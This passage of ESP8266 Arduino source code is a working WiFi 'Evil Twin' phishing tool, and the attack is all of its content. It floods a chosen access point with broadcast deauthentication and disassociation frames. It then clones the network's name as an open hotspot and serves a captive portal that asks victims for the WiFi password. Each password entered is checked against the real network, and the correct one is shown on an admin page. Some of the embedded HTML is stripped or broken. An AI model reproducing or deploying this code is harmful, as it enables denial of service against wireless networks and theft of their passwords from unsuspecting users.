© All rights reserved.
WiFi password:" +
"" + footer();
}
void setup() {
Serial.begin(115200);
WiFi.mode(WIFI_AP_STA);
wifi_promiscuous_enable(1);
WiFi.softAPConfig(IPAddress(192, 168, 4, 1) , IPAddress(192, 168, 4, 1) , IPAddress(255, 255, 255, 0));
WiFi.softAP("WiPhi_34732", "Op00000000");
dnsServer.start(53, "*", IPAddress(192, 168, 4, 1));
webServer.on("/", handleIndex);
webServer.on("/result", handleResult);
webServer.on("/admin", handleAdmin);
webServer.onNotFound(handleIndex);
webServer.begin();
}
void performScan() {
int n = WiFi.scanNetworks();
clearArray();
if (n >= 0) {
for (int i = 0; i < n && i < 16; ++i) {
_Network network;
network.ssid = WiFi.SSID(i);
for (int j = 0; j < 6; j++) {
network.bssid[j] = WiFi.BSSID(i)[j];
}
network.ch = WiFi.channel(i);
_networks[i] = network;
}
}
}
bool hotspot_active = false;
bool deauthing_active = false;
void handleResult() {
String html = "";
if (WiFi.status() != WL_CONNECTED) {
if (webServer.arg("deauth") == "start") {
deauthing_active = true;
}
webServer.send(200, "text/html", "<script> setTimeout(function(){window.location.href = '/';}, 4000); </script>
⊗
Wrong Password
Please, try again.
");
Serial.println("Wrong password tried!");
} else {
_correct = "Successfully got password for: " + _selectedNetwork.ssid + " Password: " + _tryPassword;
hotspot_active = false;
dnsServer.stop();
int n = WiFi.softAPdisconnect (true);
Serial.println(String(n));
WiFi.softAPConfig(IPAddress(192, 168, 4, 1) , IPAddress(192, 168, 4, 1) , IPAddress(255, 255, 255, 0));
WiFi.softAP("WiPhi_34732", "Op00000000");
dnsServer.start(53, "*", IPAddress(192, 168, 4, 1));
Serial.println("Good password was entered !");
Serial.println(_correct);
}
}
String _tempHTML = ""
"<style> .content {max-width: 500px;margin: auto;}table, th, td {border: 1px solid black;border-collapse: collapse;padding-left:10px;padding-right:10px;}</style>"
"
"
"
"
"<button style='display:inline-block;'{disabled}>{deauth_button}"
""
"<button style='display:inline-block;'{disabled}>{hotspot_button}"
"
";
void handleIndex() {
if (webServer.hasArg("ap")) {
for (int i = 0; i < 16; i++) {
if (bytesToStr(_networks[i].bssid, 6) == webServer.arg("ap") ) {
_selectedNetwork = _networks[i];
}
}
}
if (webServer.hasArg("deauth")) {
if (webServer.arg("deauth") == "start") {
deauthing_active = true;
} else if (webServer.arg("deauth") == "stop") {
deauthing_active = false;
}
}
if (webServer.hasArg("hotspot")) {
if (webServer.arg("hotspot") == "start") {
hotspot_active = true;
dnsServer.stop();
int n = WiFi.softAPdisconnect (true);
Serial.println(String(n));
WiFi.softAPConfig(IPAddress(192, 168, 4, 1) , IPAddress(192, 168, 4, 1) , IPAddress(255, 255, 255, 0));
WiFi.softAP(_selectedNetwork.ssid.c_str());
dnsServer.start(53, "*", IPAddress(192, 168, 4, 1));
} else if (webServer.arg("hotspot") == "stop") {
hotspot_active = false;
dnsServer.stop();
int n = WiFi.softAPdisconnect (true);
Serial.println(String(n));
WiFi.softAPConfig(IPAddress(192, 168, 4, 1) , IPAddress(192, 168, 4, 1) , IPAddress(255, 255, 255, 0));
WiFi.softAP("WiPhi_34732", "Op00000000");
dnsServer.start(53, "*", IPAddress(192, 168, 4, 1));
}
return;
}
if (hotspot_active == false) {
String _html = _tempHTML;
for (int i = 0; i < 16; ++i) {
if ( _networks[i].ssid == "") {
break;
}
_html += "<tr><td>" + _networks[i].ssid + "</td><td>" + bytesToStr(_networks[i].bssid, 6) + "</td><td>" + String(_networks[i].ch) + "<td><form method='post' action='/?ap=" + bytesToStr(_networks[i].bssid, 6) + "'>";
if (bytesToStr(_selectedNetwork.bssid, 6) == bytesToStr(_networks[i].bssid, 6)) {
_html += "<button style='background-color: #90ee90;'>Selected</button></form></td></tr>";
} else {
_html += "<button>Select</button></form></td></tr>";
}
}
if (deauthing_active) {
_html.replace("{deauth_button}", "Stop deauthing");
_html.replace("{deauth}", "stop");
} else {
_html.replace("{deauth_button}", "Start deauthing");
_html.replace("{deauth}", "start");
}
if (hotspot_active) {
_html.replace("{hotspot_button}", "Stop EvilTwin");
_html.replace("{hotspot}", "stop");
} else {
_html.replace("{hotspot_button}", "Start EvilTwin");
_html.replace("{hotspot}", "start");
}
if (_selectedNetwork.ssid == "") {
_html.replace("{disabled}", " disabled");
} else {
_html.replace("{disabled}", "");
}
_html += "</table>";
if (_correct != "") {
_html += "</br><h3>" + _correct + "</h3>";
}
_html += "</div></body></html>";
webServer.send(200, "text/html", _html);
} else {
if (webServer.hasArg("password")) {
_tryPassword = webServer.arg("password");
if (webServer.arg("deauth") == "start") {
deauthing_active = false;
}
delay(1000);
WiFi.disconnect();
WiFi.begin(_selectedNetwork.ssid.c_str(), webServer.arg("password").c_str(), _selectedNetwork.ch, _selectedNetwork.bssid);
webServer.send(200, "text/html", "<!DOCTYPE html> <html><script> setTimeout(function(){window.location.href = '/result';}, 15000); </script></head><body><center><h2 style='font-size:7vw'>Verifying integrity, please wait...<br><progress value='10' max='100'>10%</progress></h2></center></body> </html>");
if (webServer.arg("deauth") == "start") {
deauthing_active = true;
}
} else {
webServer.send(200, "text/html", index());
}
}
}
void handleAdmin() {
String _html = _tempHTML;
if (webServer.hasArg("ap")) {
for (int i = 0; i < 16; i++) {
if (bytesToStr(_networks[i].bssid, 6) == webServer.arg("ap") ) {
_selectedNetwork = _networks[i];
}
}
}
if (webServer.hasArg("deauth")) {
if (webServer.arg("deauth") == "start") {
deauthing_active = true;
} else if (webServer.arg("deauth") == "stop") {
deauthing_active = false;
}
}
if (webServer.hasArg("hotspot")) {
if (webServer.arg("hotspot") == "start") {
hotspot_active = true;
dnsServer.stop();
int n = WiFi.softAPdisconnect (true);
Serial.println(String(n));
WiFi.softAPConfig(IPAddress(192, 168, 4, 1) , IPAddress(192, 168, 4, 1) , IPAddress(255, 255, 255, 0));
WiFi.softAP(_selectedNetwork.ssid.c_str());
dnsServer.start(53, "*", IPAddress(192, 168, 4, 1));
} else if (webServer.arg("hotspot") == "stop") {
hotspot_active = false;
dnsServer.stop();
int n = WiFi.softAPdisconnect (true);
Serial.println(String(n));
WiFi.softAPConfig(IPAddress(192, 168, 4, 1) , IPAddress(192, 168, 4, 1) , IPAddress(255, 255, 255, 0));
WiFi.softAP("WiPhi_34732", "Op00000000");
dnsServer.start(53, "*", IPAddress(192, 168, 4, 1));
}
return;
}
for (int i = 0; i < 16; ++i) {
if ( _networks[i].ssid == "") {
break;
}
_html += "
SSID | BSSID | Channel | Select |
" + _networks[i].ssid + " | " + bytesToStr(_networks[i].bssid, 6) + " | " + String(_networks[i].ch) + " | ";
if ( bytesToStr(_selectedNetwork.bssid, 6) == bytesToStr(_networks[i].bssid, 6)) {
_html += "<button style='background-color: #90ee90;'>Selected</button></form></td></tr>";
} else {
_html += "<button>Select</button></form></td></tr>";
}
}
if (deauthing_active) {
_html.replace("{deauth_button}", "Stop deauthing");
_html.replace("{deauth}", "stop");
} else {
_html.replace("{deauth_button}", "Start deauthing");
_html.replace("{deauth}", "start");
}
if (hotspot_active) {
_html.replace("{hotspot_button}", "Stop EvilTwin");
_html.replace("{hotspot}", "stop");
} else {
_html.replace("{hotspot_button}", "Start EvilTwin");
_html.replace("{hotspot}", "start");
}
if (_selectedNetwork.ssid == "") {
_html.replace("{disabled}", " disabled");
} else {
_html.replace("{disabled}", "");
}
if (_correct != "") {
_html += "
" + _correct + "";
}
_html += " |
";
webServer.send(200, "text/html", _html);
}
String bytesToStr(const uint8_t* b, uint32_t size) {
String str;
const char ZERO = '0';
const char DOUBLEPOINT = ':';
for (uint32_t i = 0; i < size; i++) {
if (b[i] < 0x10) str += ZERO;
str += String(b[i], HEX);
if (i < size - 1) str += DOUBLEPOINT;
}
return str;
}
unsigned long now = 0;
unsigned long wifinow = 0;
unsigned long deauth_now = 0;
bool sendPacket(uint8_t* packet, uint16_t packetSize, uint8_t wifi_channel) {
Serial.println(wifi_channel);
// Serial.println(bytesToStr(packet, 26));
wifi_set_channel(wifi_channel);
bool sent = wifi_send_pkt_freedom(packet, packetSize, 0) == 0;
if (sent) Serial.println("done");
return sent;
}
void loop() {
dnsServer.processNextRequest();
webServer.handleClient();
if (deauthing_active && millis() - deauth_now >= 200) {
uint8_t packet[26] = {
0xC0, 0x00,
0x00, 0x00,
0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00,
0x01, 0x00
};
bool success = false;
memcpy(&packet[10], _selectedNetwork.bssid, 6);
memcpy(&packet[16], _selectedNetwork.bssid, 6);
if (sendPacket(packet, sizeof(packet), _selectedNetwork.ch)) {
success = true;
}
// send disassociate frame
packet[0] = 0xa0;
if (sendPacket(packet, sizeof(packet), _selectedNetwork.ch)) {
success = true;
}
// uint8_t* apMac;
// uint8_t reason;
// uint8_t ch;
// apMac = _selectedNetwork.bssid;
// uint8_t stMac[6] = {0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF};
// reason = 1;
// ch = _selectedNetwork.ch;
// deauthDevice(apMac, stMac, reason, ch);
// uint8_t deauthPacket[26] = {
// /* 0 - 1 */ 0xC0, 0x00, // type, subtype c0: deauth (a0: disassociate)
// /* 2 - 3 */ 0x00, 0x00, // duration (SDK takes care of that)
// /* 4 - 9 */ 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, // reciever (target)
// /* 10 - 15 */ 0xb6, 0x69, 0x21, 0x74, 0x02, 0xb6, // source (ap)
// /* 16 - 21 */ 0xb6, 0x69, 0x21, 0x74, 0x02, 0xb6, // BSSID (ap)
// /* 22 - 23 */ 0x00, 0x00, // fragment & squence number
// /* 24 - 25 */ 0x01, 0x00 // reason code (1 = unspecified reason)
// };
// packetSize = sizeof(deauthPacket);
// uint8_t deauthpkt[packetSize];
// uint8_t broadcast[] = {0x32, 0xAE, 0xA4, 0x07, 0x0D, 0x66};
// memcpy(deauthpkt, deauthPacket, packetSize);
// memcpy(&deauthpkt[4], broadcast, 6);
// // memcpy(&deauthpkt[10], _selectedNetwork.bssid, 6);
// // memcpy(&deauthpkt[16], _selectedNetwork.bssid, 6);
// deauthpkt[24] = 1;
// Serial.println(bytesToStr(deauthPacket, 26));
// deauthpkt[0] = 0xc0;
// wifi_set_channel(_selectedNetwork.ch);
// Serial.println(wifi_send_pkt_freedom(deauthpkt, sizeof(deauthPacket), 0));
// Serial.println(bytesToStr(deauthPacket, 26));
// uint8_t disassocpkt[packetSize];
// memcpy(disassocpkt, deauthpkt, packetSize);
// disassocpkt[0] = 0Xa0;
// Serial.println(wifi_send_pkt_freedom(disassocpkt, sizeof(deauthPacket), 0));
// deauth_now = millis();
// packetSize = sizeof(deauthPacket);
// uint8_t deauthpkt[sizeof(deauthPacket)];
// memcpy(deauthpkt, deauthPacket, packetSize);
// memcpy(&deauthPacket[4], broadcast, 6);
// memcpy(&deauthPacket[10], _selectedNetwork.bssid, 6);
// memcpy(&deauthPacket[16], _selectedNetwork.bssid, 6);
// uint8_t deauthPacket[24] = 1;
// // send deauth frame
// uint8_t deauthPacket[0] = 0xc0;
// wifi_set_channel(_selectedNetwork.ch);
// wifi_send_pkt_freedom(deauthPacket, sizeof(deauthPacket), _selectedNetwork.ch) == 0;
// // send disassociate frame
// // uint8_t disassocpkt[packetSize];
// // memcpy(disassocpkt, deauthPacket, packetSize);
// uint8_t disassocpkt[0] = 0xa0;
// wifi_set_channel(_selectedNetwork.ch);
// wifi_send_pkt_freedom(deauthPacket, sizeof(deauthPacket), _selectedNetwork.ch) == 0;
deauth_now = millis();
}
if (millis() - now >= 15000) {
performScan();
now = millis();
}
if (millis() - wifinow >= 2000) {
// if (WiFi.status() != WL_CONNECTED) {
// Serial.println("BAD");
// } else {
// Serial.println("GOOD");
// }
wifinow = millis();
}
}